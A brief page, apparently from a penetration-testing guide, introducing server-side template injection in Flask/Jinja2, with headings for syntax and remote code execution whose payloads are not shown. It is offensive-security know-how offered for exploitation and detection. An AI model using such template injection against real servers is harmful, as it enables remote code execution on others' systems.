Templates Injections ✖️
SSTI (Server Side Templates Injections) occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
There are different frameworks that uses templates, this guide could help to detect which is and exploit them.
Flask
Flask is a framework for web applications written in Python and developed from the Werkzeug and Jinja2 tools.
Syntax SSTI
RCE (Remote Code Execution)
To bypass some restrictions take a look at the following resources:
References
Last updated